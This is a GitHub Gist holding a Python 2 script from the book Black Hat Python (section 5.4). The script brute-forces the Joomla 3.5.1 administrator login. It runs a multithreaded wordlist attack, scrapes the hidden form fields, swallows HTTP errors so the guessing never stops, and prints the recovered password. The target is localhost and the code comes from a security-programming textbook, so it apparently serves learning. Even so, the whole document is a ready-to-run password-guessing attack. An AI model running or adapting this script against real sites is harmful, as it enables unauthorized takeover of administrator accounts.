Created
July 3, 2016 13:05
-
-
Save ak1t0/41c28aa542804e10267ec025f8baff5b to your computer and use it in GitHub Desktop.
Black Hat Python 5.4
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # サイバーセキュリティプログラミング 5.4 | |
| # Joomla 3.5.1 | |
| # HTTPErrorでループが止まるので例外を握りつぶすように変更 | |
| import urllib2 | |
| import urllib | |
| import cookielib | |
| import threading | |
| import sys | |
| import Queue | |
| from HTMLParser import HTMLParser | |
| user_thread = 10 | |
| username = "admin" | |
| wordlist_file = "cain.txt" | |
| resume = None | |
| target_url = "http://localhost/administrator/index.php" | |
| target_post = "http://localhost/administrator/index.php" | |
| username_field = "username" | |
| password_field = "passwd" | |
| success_check = "Administration" | |
| class Bruter(object): | |
| def __init__(self, username, words): | |
| self.username = username | |
| self.password_q = words | |
| self.found = False | |
| print "Finished setting up for: %s" % username | |
| def run_bruteforce(self): | |
| for i in range(user_thread): | |
| t = threading.Thread(target=self.web_bruter) | |
| t.start() | |
| def web_bruter(self): | |
| while not self.password_q.empty() and not self.found: | |
| brute = self.password_q.get().rstrip() | |
| jar = cookielib.FileCookieJar("cookies") | |
| opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) | |
| response = opener.open(target_url) | |
| page = response.read() | |
| print "Trying: %s : %s (%d left)" % (self.username,brute,self.password_q.qsize()) | |
| parser = BruteParser() | |
| parser.feed(page) | |
| post_tags = parser.tag_results | |
| post_tags[username_field] = self.username | |
| post_tags[password_field] = brute | |
| login_data = urllib.urlencode(post_tags) | |
| try: | |
| login_response = opener.open(target_post, login_data) | |
| login_result = login_response.read() | |
| except: | |
| continue | |
| if success_check in login_result: | |
| self.found = True | |
| print "[*] Bruteforce Successful." | |
| print "[*] Username: %s" % username | |
| print "[*] Password: %s" % brute | |
| print "[*] Waiting for other threads to exit..." | |
| class BruteParser(HTMLParser): | |
| def __init__(self): | |
| HTMLParser.__init__(self) | |
| self.tag_results = {} | |
| def handle_starttag(self, tag, attrs): | |
| if tag == "input": | |
| tag_name = None | |
| tag_value = None | |
| for name,value in attrs: | |
| if name == "name": | |
| tag_name = value | |
| if name == "value": | |
| tag_value = value | |
| if tag_name is not None: | |
| self.tag_results[tag_name] = value | |
| def build_wordlist(wordlist_file): | |
| fd = open(wordlist_file,"rb") | |
| raw_words = fd.readlines() | |
| fd.close() | |
| found_resume = False | |
| words = Queue.Queue() | |
| for word in raw_words: | |
| word = word.rstrip() | |
| if resume is not None: | |
| if found_resume: | |
| words.put(word) | |
| else: | |
| if word == resume: | |
| found_resume = True | |
| print "Resuming wordlist form: %s" % resume | |
| else: | |
| words.put(word) | |
| return words | |
| words = build_wordlist(wordlist_file) | |
| bruter_obj = Bruter(username,words) | |
| bruter_obj.run_bruteforce() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment